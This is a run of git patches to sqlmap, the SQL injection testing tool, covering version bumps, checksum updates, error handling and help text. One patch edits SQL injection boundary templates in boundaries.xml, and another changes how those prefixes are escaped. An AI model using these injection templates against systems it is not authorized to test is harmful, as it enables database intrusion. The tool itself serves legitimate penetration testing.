dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -119,21 +119,21 @@ d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py 4703ceeb32131a9a7a6561575644123b lib/utils/versioncheck.py e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py -b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py +d8a541a63f3b561334de51abb4dcad55 plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py cdd082981b421248ece0e7cf278071ff plugins/dbms/access/fingerprint.py e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py 77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py 2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py -8df07c2805aceb7d6fb4add40de84795 plugins/dbms/db2/connector.py +24a79eb2dde8ea9340a701c8c2591701 plugins/dbms/db2/connector.py 4deeda463003ab71e7d2f34a263b5bbf plugins/dbms/db2/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py ce434fc05a7ad236c49a155d62f0cac4 plugins/dbms/db2/fingerprint.py 95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py 82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py -53bd7de27d37958f543f5329362ac298 plugins/dbms/firebird/connector.py +1ac54bbfb81ffed945636432bc49466b plugins/dbms/firebird/connector.py bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py bf98dbd666c162088f23ee697c065010 plugins/dbms/firebird/fingerprint.py @@ -147,7 +147,7 @@ aabc2b877a3696b99912bdf362c0fb69 plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py -97dac442190bd4ffac3ba292e2abfd4c plugins/dbms/informix/connector.py +d61a5f79a9fa07c06fe7f5a653662e95 plugins/dbms/informix/connector.py c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py b182f01c2ba82aa94fbe4948383ea98d plugins/dbms/informix/fingerprint.py @@ -169,7 +169,7 @@ f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py 3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py -11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py +14bfa3960ed0b4bec2cd29800ec525b7 plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py edec54520556a5eb66900fca697940ff plugins/dbms/mysql/filesystem.py 1c0175476b833a1b788550726be67c99 plugins/dbms/mysql/fingerprint.py From d1022f3f59fc82bee58ea46b2673a9b86f1eb5bf Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 4 Oct 2018 13:51:41 +0200 Subject: [PATCH 316/428] Fixes #3246 --- lib/core/agent.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 1a6f9819972..8971ab0f4b3 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -1089,7 +1089,7 @@ def whereQuery(self, query): if conf.dumpWhere and query: prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "") - if "%s)" % conf.tbl.upper() in prefix.upper(): + if conf.tbl and "%s)" % conf.tbl.upper() in prefix.upper(): prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix) elif re.search(r"(?i)\bWHERE\b", prefix): prefix += " AND %s" % conf.dumpWhere diff --git a/lib/core/settings.py b/lib/core/settings.py index d4c4f3d9f0a..8486b1ce692 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.10" +VERSION = "1.2.10.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 777e9baeded..01dc26cff1b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py +effd6e6a07b13fd8b3803ed4b89b06e2 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py 11448f59efbfdceff2437239e36d9dc5 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d6947d662df4d4bc9c33012a98a5fbc8 lib/core/settings.py +0ad6a2aebce990c7d4a1dd717ad3908a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From f2b4dc3ffc634080e9420e264fdd6155911f2ea1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 8 Oct 2018 23:34:55 +0200 Subject: [PATCH 317/428] Fixes #3275 --- lib/controller/controller.py | 21 +++++++++++++-------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 16 insertions(+), 11 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index ad12620c7e7..16395be1c54 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -56,6 +56,7 @@ from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSkipTargetException +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapValueException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import ASP_NET_CONTROL_REGEX @@ -243,16 +244,20 @@ def _saveToResultsFile(): results[key].extend(injection.data.keys()) - for key, value in results.items(): - place, parameter, notes = key - line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep) - conf.resultsFP.write(line) + try: + for key, value in results.items(): + place, parameter, notes = key + line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep) + conf.resultsFP.write(line) - if not results: - line = "%s,,,,%s" % (conf.url, os.linesep) - conf.resultsFP.write(line) + if not results: + line = "%s,,,,%s" % (conf.url, os.linesep) + conf.resultsFP.write(line) - conf.resultsFP.flush() + conf.resultsFP.flush() + except IOError, ex: + errMsg = "unable to write to the results file '%s' ('%s'). " % (conf.resultsFilename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) @stackedmethod def start(): diff --git a/lib/core/settings.py b/lib/core/settings.py index 8486b1ce692..927437b9bdd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.11" +VERSION = "1.2.10.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 01dc26cff1b..9a0c3e84350 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 61b66a7c30eb43c6b99ad57e4a8b5b22 lib/controller/checks.py -c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py +d6deacb76e1f479b3c690c215fad1c08 lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py effd6e6a07b13fd8b3803ed4b89b06e2 lib/core/agent.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0ad6a2aebce990c7d4a1dd717ad3908a lib/core/settings.py +fe0cffe5cf3eb9de96697f8ba3f0f297 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From e005ba3f773f4f27eb8eaa48624be336dba2a11a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 11 Oct 2018 23:59:09 +0200 Subject: [PATCH 318/428] Minor patch --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/boundaries.xml | 13 ++----------- 3 files changed, 5 insertions(+), 14 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 927437b9bdd..da315543715 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.12" +VERSION = "1.2.10.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9a0c3e84350..bd4e3b7241c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fe0cffe5cf3eb9de96697f8ba3f0f297 lib/core/settings.py +d3595e4cbdf8fa81c648a8caa339a444 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -468,7 +468,7 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml -3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml +385570003bf7d84f2502191eae8268c6 xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index 857551e6bbe..7317fdaf055 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -383,7 +383,7 @@ Formats: 9 1 2 - '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] + '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] )||' @@ -392,19 +392,10 @@ Formats: 9 1 2 - '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] )||' - - 5 - 9 - 1 - 1 - '+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM] - )+' - - 5 9 From 5efe3228f861fa852c67a91060ca2c912ea3ec18 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 12 Oct 2018 00:16:42 +0200 Subject: [PATCH 319/428] Patch related to the #3282 --- lib/core/agent.py | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 8971ab0f4b3..423f66bd7bb 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -246,6 +246,9 @@ def prefixQuery(self, expression, prefix=None, where=None, clause=None): else: query = kb.injection.prefix or prefix or "" + if "SELECT '[RANDSTR]'" in query: # escaping of pre-WHERE prefixes + query = query.replace("'[RANDSTR]'", unescaper.escape(randomStr(), quote=False)) + if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('): query += " " diff --git a/lib/core/settings.py b/lib/core/settings.py index da315543715..025ee75c294 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.13" +VERSION = "1.2.10.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bd4e3b7241c..d777a525a1d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py d6deacb76e1f479b3c690c215fad1c08 lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -effd6e6a07b13fd8b3803ed4b89b06e2 lib/core/agent.py +6f9bc9a98821572b68819b8f12de6b59 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py 11448f59efbfdceff2437239e36d9dc5 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d3595e4cbdf8fa81c648a8caa339a444 lib/core/settings.py +2e35f0241f73d87a34eb070faa227244 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From 880d4384183692c2d8bccbc9c2f89619a24a6332 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 12 Oct 2018 00:29:43 +0200 Subject: [PATCH 320/428] Fixes #3284 --- lib/controller/checks.py | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 211ae5c8f71..fac6027e456 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1355,9 +1355,11 @@ def checkWaf(): value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) pushValue(kb.redirectChoice) + pushValue(kb.resendPostOnRedirect) pushValue(conf.timeout) kb.redirectChoice = REDIRECTION.YES + kb.resendPostOnRedirect = False conf.timeout = IDS_WAF_CHECK_TIMEOUT try: @@ -1368,6 +1370,7 @@ def checkWaf(): kb.matchRatio = None conf.timeout = popValue() + kb.resendPostOnRedirect = popValue() kb.redirectChoice = popValue() if retVal: diff --git a/lib/core/settings.py b/lib/core/settings.py index 025ee75c294..79907ed1e83 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.14" +VERSION = "1.2.10.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d777a525a1d..93d570c5d3d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -23,7 +23,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -61b66a7c30eb43c6b99ad57e4a8b5b22 lib/controller/checks.py +51bd96b450cbfdbff8eea4801e7486ae lib/controller/checks.py d6deacb76e1f479b3c690c215fad1c08 lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2e35f0241f73d87a34eb070faa227244 lib/core/settings.py +ca4c50212724a4ea997265f419803db1 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From 6af127cb64915931b40bb8ee099513a1fcb7f70b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 14 Oct 2018 22:17:10 +0200 Subject: [PATCH 321/428] Fixes #3286 --- lib/core/settings.py | 2 +- lib/core/threads.py | 2 +- sqlmap.py | 14 +++++++------- txt/checksum.md5 | 6 +++--- 4 files changed, 12 insertions(+), 12 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 79907ed1e83..36642d02c39 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.15" +VERSION = "1.2.10.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/threads.py b/lib/core/threads.py index c6588dd1101..5d8ea0edc81 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -92,7 +92,7 @@ def exceptionHandledFunction(threadFunction, silent=False): kb.threadException = True raise except Exception, ex: - if not silent: + if not silent and kb.get("threadContinue"): logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) if conf.get("verbose") > 1: diff --git a/sqlmap.py b/sqlmap.py index 7085f59edd8..3f749d23fbd 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -384,13 +384,6 @@ def main(): with openFile(conf.harFile, "w+b") as f: json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': ')) - if cmdLineOptions.get("sqlmapShell"): - cmdLineOptions.clear() - conf.clear() - kb.clear() - conf.disableBanner = True - main() - if conf.get("api"): try: conf.databaseCursor.disconnect() @@ -405,6 +398,13 @@ def main(): _ = time.time() while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: time.sleep(0.01) + + if cmdLineOptions.get("sqlmapShell"): + cmdLineOptions.clear() + conf.clear() + kb.clear() + conf.disableBanner = True + main() except KeyboardInterrupt: pass finally: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 93d570c5d3d..bdddb541eac 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,12 +49,12 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ca4c50212724a4ea997265f419803db1 lib/core/settings.py +bd070cf6683de2f9ed462d35eba1ead5 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py -29efb66f3c444c09d29925cf552851cd lib/core/threads.py +cd0067d1798e45f422ce44b98baf57db lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py @@ -227,7 +227,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -c6f90d321b9ec7bff5b3be15cd4e19d8 sqlmap.py +d94547672ec6dbc4c2adffbf62bd36d4 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From 465a1e1a86e88bd8df9f4a1b9554f2570a803084 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 15 Oct 2018 00:53:26 +0200 Subject: [PATCH 322/428] Minor update --- lib/core/settings.py | 2 +- lib/core/target.py | 9 ++++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 36642d02c39..4185d512021 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.16" +VERSION = "1.2.10.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index cb3f755a621..66f237dc87b 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -44,6 +44,7 @@ from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapMissingPrivileges +from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUserQuitException from lib.core.option import _setDBMS @@ -466,7 +467,13 @@ def _resumeDBMS(): value = hashDBRetrieve(HASHDB_KEYS.DBMS) if not value: - return + if conf.offline: + errMsg = "unable to continue in offline mode " + errMsg += "because of lack of usable " + errMsg += "session data" + raise SqlmapNoneDataException(errMsg) + else: + return dbms = value.lower() dbmsVersion = [UNKNOWN_DBMS_VERSION] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bdddb541eac..da805c11a58 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,10 +49,10 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -bd070cf6683de2f9ed462d35eba1ead5 lib/core/settings.py +f9c54a74954157624dafa19b563d92b6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -62bc180e3e828949ffb342a8f756c183 lib/core/target.py +47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py cd0067d1798e45f422ce44b98baf57db lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From 1f2bdf5a3d67845e91f5cc149aa4d80bf3081021 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 15 Oct 2018 00:56:23 +0200 Subject: [PATCH 323/428] Trivial message update --- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 2 +- sqlmap.conf | 2 +- txt/checksum.md5 | 4 ++-- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 4185d512021..263d5bfe0df 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.17" +VERSION = "1.2.10.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 86faefd9b56..8cc577e66c1 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -626,7 +626,7 @@ def cmdLineParser(argv=None): help="Clean up the DBMS from sqlmap specific UDF and tables") miscellaneous.add_option("--dependencies", dest="dependencies", action="store_true", - help="Check for missing (non-core) sqlmap dependencies") + help="Check for missing (optional) sqlmap dependencies") miscellaneous.add_option("--disable-coloring", dest="disableColoring", action="store_true", help="Disable console output coloring") diff --git a/sqlmap.conf b/sqlmap.conf index b81fa51f47b..dcbe92af381 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -761,7 +761,7 @@ checkPayload = False # Valid: True or False cleanup = False -# Check for missing (non-core) sqlmap dependencies. +# Check for missing (optional) sqlmap dependencies. # Valid: True or False dependencies = False diff --git a/txt/checksum.md5 b/txt/checksum.md5 index da805c11a58..a7c7b5f06e8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f9c54a74954157624dafa19b563d92b6 lib/core/settings.py +fb1892f8a3902907dcd6c75f58dd80c1 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -60,7 +60,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -4296aee13e84a7394f2329dc7ea542ef lib/parse/cmdline.py +6458f20d6ebe20fb45a79a09c2874d33 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From 9f6e04b14106c90dd08d6d1bec59268eaabe8e7d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 15 Oct 2018 02:15:05 +0200 Subject: [PATCH 324/428] Minor update of help text --- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 12 ++++++------ sqlmap.conf | 12 ++++++------ txt/checksum.md5 | 4 ++-- 4 files changed, 15 insertions(+), 15 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py 